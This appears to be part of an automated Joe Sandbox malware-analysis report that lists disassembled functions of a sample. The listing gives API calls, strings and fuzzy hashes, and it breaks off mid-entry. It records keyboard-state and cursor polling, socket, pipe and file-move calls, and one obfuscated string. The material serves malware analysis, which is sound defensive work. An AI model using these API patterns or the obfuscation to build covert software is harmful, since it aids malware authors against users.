Instruction Fuzzy Hash: 8E91C670A00259AFDF20CFA6C844FAF7BB8EF86715F10855AF505AB280D7789945CFA4

Function 004D1187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 004D125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 004D1284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 004D12A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 004D12D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 004D135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 004D13C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 004D1430

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: f5227bd25ffaceb1704e7af8c5f94422877fdb616ed5516d77457bf264265d78
Instruction ID: 9fd337208135e6cbfa1387edda164c0d7fc124bbcd0a73b78cec65caf2aed3d1
Opcode Fuzzy Hash: f5227bd25ffaceb1704e7af8c5f94422877fdb616ed5516d77457bf264265d78
Instruction Fuzzy Hash: 0D91D171A00218AFDB00DF99C8A4BBE77B5FF44318F14406BE900E73A1D779A941CB99

Function 0047948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: f62e4d8a1a438d188262d133cd2d8a1f753b9ca0dcfd57921c583150a29368aa
Instruction ID: 81f45990301265bb2d1b9412e63310e808941e4b4189a6a96fc2be62741aba5e
Opcode Fuzzy Hash: f62e4d8a1a438d188262d133cd2d8a1f753b9ca0dcfd57921c583150a29368aa
Instruction Fuzzy Hash: 62912771904219EFCB10CFA9C884AEEBBB8FF49320F14855AE515B7251D778AD42CB64

Function 004E3947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 004E396B
CharUpperBuffW.USER32(?,?), ref: 004E3A7A
_wcslen.LIBCMT ref: 004E3A8A
VariantClear.OLEAUT32(?), ref: 004E3C1F

Part of subcall function 004D0CDF: VariantInit.OLEAUT32(00000000), ref: 004D0D1F
Part of subcall function 004D0CDF: VariantCopy.OLEAUT32(?,?), ref: 004D0D28
Part of subcall function 004D0CDF: VariantClear.OLEAUT32(?), ref: 004D0D34

Strings

AUTOIT.ERROR, xrefs: 004E3A80, 004E3A85
Incorrect Parameter format, xrefs: 004E39A6, 004E3BA1

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: eea55bd855e174e3c3d7584e873c32bf88139ef98e03fead4418019b12a19da5
Instruction ID: 6ddf0ece4ccb9473f822d7b8ecef27b009683d6f1e663ffcf509e5c8d019418c
Opcode Fuzzy Hash: eea55bd855e174e3c3d7584e873c32bf88139ef98e03fead4418019b12a19da5
Instruction Fuzzy Hash: 19918C756083459FC700DF26C48496AB7E4FF89319F14886EF88A97351DB38EE45CB86

Function 004E4BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 004C000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,004BFF41,80070057,?,?,?,004C035E), ref: 004C002B
Part of subcall function 004C000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004BFF41,80070057,?,?), ref: 004C0046
Part of subcall function 004C000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004BFF41,80070057,?,?), ref: 004C0054
Part of subcall function 004C000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004BFF41,80070057,?), ref: 004C0064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 004E4C51
_wcslen.LIBCMT ref: 004E4D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 004E4DCF
CoTaskMemFree.OLE32(?), ref: 004E4DDA

Strings

NULL Pointer assignment, xrefs: 004E4E23, 004E4E52

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 257757c4e663472896755f4af17983eb6d76d6abaccd09796a5b5314d6aef9c5
Instruction ID: 376b191d61a2e514f81ac87f6405073e54f724699dcd1d933d2d27a196d32065
Opcode Fuzzy Hash: 257757c4e663472896755f4af17983eb6d76d6abaccd09796a5b5314d6aef9c5
Instruction Fuzzy Hash: 21913671D0021D9BDF14DFA6C880AEEB7B8BF48304F10856AE915B7241EB785A44CF65

Function 004F20FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 004F2183
GetMenuItemCount.USER32(00000000), ref: 004F21B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004F21DD
_wcslen.LIBCMT ref: 004F2213
GetMenuItemID.USER32(?,?), ref: 004F224D
GetSubMenu.USER32(?,?), ref: 004F225B

Part of subcall function 004C3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 004C3A57
Part of subcall function 004C3A3D: GetCurrentThreadId.KERNEL32 ref: 004C3A5E
Part of subcall function 004C3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004C25B3), ref: 004C3A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 004F22E3

Part of subcall function 004CE97B: Sleep.KERNEL32 ref: 004CE9F3

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 1078d412bf413893f4f757ef4fd6809301c1a1da107a05649d299efdf4935566
Instruction ID: 95660d55dea2d067865c63cee81f3617360beed815ac52fc5bdeec140c4f71da
Opcode Fuzzy Hash: 1078d412bf413893f4f757ef4fd6809301c1a1da107a05649d299efdf4935566
Instruction Fuzzy Hash: 26719175A00209AFCB10DFA5C981ABEB7F1EF48314F11849AE916EB341D778ED41CB99

Function 004CAEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 004CAEF9
GetKeyboardState.USER32(?), ref: 004CAF0E
SetKeyboardState.USER32(?), ref: 004CAF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 004CAF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 004CAFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 004CAFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 004CB020

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 6d986cde79ae19e40ad61846554ce3035a4fb01546b15c7794176ac8184eaf58
Instruction ID: 453c4c3981761c6fd64f4f206347d539584112b9c4f43c815e04541b52dced97
Opcode Fuzzy Hash: 6d986cde79ae19e40ad61846554ce3035a4fb01546b15c7794176ac8184eaf58
Instruction Fuzzy Hash: 2351D3A46047D93DFB7642348C46FBB7EA99B06308F08848EE1D5855C2C3ACAC94D79A

Function 004CACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 004CAD19
GetKeyboardState.USER32(?), ref: 004CAD2E
SetKeyboardState.USER32(?), ref: 004CAD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 004CADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 004CADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 004CAE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 004CAE38

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: b8485b982f885557f637e790dda8c5c2fd6d145ca3f5e679cb983b6e7432706f
Instruction ID: 4b67406cef7c163b4e9e591006cf9cf8d54f4f2feec7734babe0d880cd7d4c11
Opcode Fuzzy Hash: b8485b982f885557f637e790dda8c5c2fd6d145ca3f5e679cb983b6e7432706f
Instruction Fuzzy Hash: BB51F7A45447D93DFB7283348C45F7B7E995B45308F08848EE1D6469C3C398ECA8D79A

Function 0049542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(004A3CD6,?,?,?,?,?,?,?,?,00495BA3,?,?,004A3CD6,?,?), ref: 00495470
__fassign.LIBCMT ref: 004954EB
__fassign.LIBCMT ref: 00495506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,004A3CD6,00000005,00000000,00000000), ref: 0049552C
WriteFile.KERNEL32(?,004A3CD6,00000000,00495BA3,00000000,?,?,?,?,?,?,?,?,?,00495BA3,?), ref: 0049554B
WriteFile.KERNEL32(?,?,00000001,00495BA3,00000000,?,?,?,?,?,?,?,?,?,00495BA3,?), ref: 00495584

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 3feb233128a1fdc96d58e8dfef47132a0de1ef332494d0615107b7b990bc9d9f
Instruction ID: 328b63ce3575e265ffb3753f1b5b44eccb228baf5d79e958a95a3e848774eaf8
Opcode Fuzzy Hash: 3feb233128a1fdc96d58e8dfef47132a0de1ef332494d0615107b7b990bc9d9f
Instruction Fuzzy Hash: 9351E5B0900609AFCF11CFA8D981AEEBBF5EF09310F25412BF545E3292D7349A41CB64

Function 0047912D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00479141
ScreenToClient.USER32(00000000,?), ref: 0047915E
GetAsyncKeyState.USER32(00000001), ref: 00479183
GetAsyncKeyState.USER32(00000002), ref: 0047919D

Strings

6dycwadycw0dycw0dycw8dycwbdycw4dycw5dycwfdycw8dycw5dycw0dycw8dycw1dycwedycwcdycwcdycw0dycw0dycw0dycw0dycw0dycw0dycw0dycwbdycw9dycw, xrefs: 004B7152

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID: 6dycwadycw0dycw0dycw8dycwbdycw4dycw5dycwfdycw8dycw5dycw0dycw8dycw1dycwedycwcdycwcdycw0dycw0dycw0dycw0dycw0dycw0dycw0dycwbdycw9dycw
API String ID: 4210589936-3864681623
Opcode ID: fc2dd3413318c4de8f8c9a187b53b5a4ebeff63c858845b9640347e847cac9ae
Instruction ID: 8639601896cd031e9db3b918b5b48bbea33fc682108c2a61f422d2154f1885c9
Opcode Fuzzy Hash: fc2dd3413318c4de8f8c9a187b53b5a4ebeff63c858845b9640347e847cac9ae
Instruction Fuzzy Hash: 5241707190851ABBDF059F68C844BFEB774FB45324F20822AE429A7390C7385D64CB65

Function 004E10B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 004E304E: inet_addr.WSOCK32(?), ref: 004E307A
Part of subcall function 004E304E: _wcslen.LIBCMT ref: 004E309B

socket.WSOCK32(00000002,00000001,00000006), ref: 004E1112
WSAGetLastError.WSOCK32 ref: 004E1121
WSAGetLastError.WSOCK32 ref: 004E11C9
closesocket.WSOCK32(00000000), ref: 004E11F9

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 6089ec79d99ae3043c15e0094f69b9e76b4f0076c887744738d85c7a4e40b9f0
Instruction ID: 79e301e63bf5dedf7bfa3bf9ed9d7b72fe468dd5c4ecf595d0d171b911dd9f4a
Opcode Fuzzy Hash: 6089ec79d99ae3043c15e0094f69b9e76b4f0076c887744738d85c7a4e40b9f0
Instruction Fuzzy Hash: CB411731200144AFDB109F55C884BBAF7E9EF48359F14805AF9059B2A1D778AD41CBE9

Function 004CCF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 004CDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,004CCF22,?), ref: 004CDDFD

Part of subcall function 004CDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,004CCF22,?), ref: 004CDE16

lstrcmpiW.KERNEL32(?,?), ref: 004CCF45
MoveFileW.KERNEL32(?,?), ref: 004CCF7F
_wcslen.LIBCMT ref: 004CD005
_wcslen.LIBCMT ref: 004CD01B
SHFileOperationW.SHELL32(?), ref: 004CD061

Strings

\*.*, xrefs: 004CCFF3

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: c3644dc103de580b62272d25862be3104747916d7d0d608dee9d5a03cfc7ca96
Instruction ID: 5edd4cf2de91f5040fc7546c28d5c430fea4a5d166f3313b67302e81a5902c03
Opcode Fuzzy Hash: c3644dc103de580b62272d25862be3104747916d7d0d608dee9d5a03cfc7ca96
Instruction Fuzzy Hash: 62414475D052185EDF52EBA5C981FDEB7B8AF08384F0000EFE509EB141EB38AA45CB58

Function 004F2DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004F2E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 004F2E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 004F2E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 004F2EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004F2EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 004F2EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004F2F0B

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: fef8afe09333763686f0cb5f4793fd903a4c5cf66e73f51f5aa203a0330a784f
Instruction ID: 1d947f03b2ac82a0d169792f1aefe93c7fce47a43fe3d7f8f38ebc23d560ac2e
Opcode Fuzzy Hash: fef8afe09333763686f0cb5f4793fd903a4c5cf66e73f51f5aa203a0330a784f
Instruction Fuzzy Hash: 18311431644158AFEB208F58DE84F6637E0EB5A710F250166FA00CF3B1CBB5A855EB09

Function 004C7726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004C7769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004C778F
SysAllocString.OLEAUT32(00000000), ref: 004C7792
SysAllocString.OLEAUT32(?), ref: 004C77B0
SysFreeString.OLEAUT32(?), ref: 004C77B9
StringFromGUID2.OLE32(?,?,00000028), ref: 004C77DE
SysAllocString.OLEAUT32(?), ref: 004C77EC

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: f3caa07c2ec3d033457a483e378f27ecee835d5bf96c5f2a6394b1f27bf09c00
Instruction ID: 1fbe416e5f9636dce443b03a651e05742b2bed88ff2ecfa4a5e52ec1476c403c
Opcode Fuzzy Hash: f3caa07c2ec3d033457a483e378f27ecee835d5bf96c5f2a6394b1f27bf09c00
Instruction Fuzzy Hash: CA21B27A60521DAFDB50DFA8CD88DBB77ACEB09364700842AF914DB250D674EC45CF68

Function 004C77FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004C7842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004C7868
SysAllocString.OLEAUT32(00000000), ref: 004C786B
SysAllocString.OLEAUT32 ref: 004C788C
SysFreeString.OLEAUT32 ref: 004C7895
StringFromGUID2.OLE32(?,?,00000028), ref: 004C78AF
SysAllocString.OLEAUT32(?), ref: 004C78BD

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 9e177e24f77106b05032007dae6720f7ed0fa5aa2e5f6a232e9f451c351b1465
Instruction ID: bbedbe74ef1d6a5ccd54dc26b512a8405af5117030e267de800948826329e526
Opcode Fuzzy Hash: 9e177e24f77106b05032007dae6720f7ed0fa5aa2e5f6a232e9f451c351b1465
Instruction Fuzzy Hash: E1214735604108AFDB50AFA9DC89EBB77ECEB09760710812AFA15CB2A1D674DC45CF78

Function 004D04D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 004D04F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 004D052E

Strings

nul, xrefs: 004D0567

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: e3300e4d83263b8dfbe2d9bef599e2b4e7b67b5fde9b54cd304447c88091543f
Instruction ID: ebcf42156dc7bcc3690fd19f1a21849370c6a89033ef57d3b68611fc82ede1ee
Opcode Fuzzy Hash: e3300e4d83263b8dfbe2d9bef599e2b4e7b67b5fde9b54cd304447c88091543f
Instruction Fuzzy Hash: 78218075900305EBDB208F29EC64BAA77A4AF45724F204A2BFCA1D73E0D7749950CF28

Function 004D05A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 004D05C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 004D0601

Strings

nul, xrefs: 004D0639

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
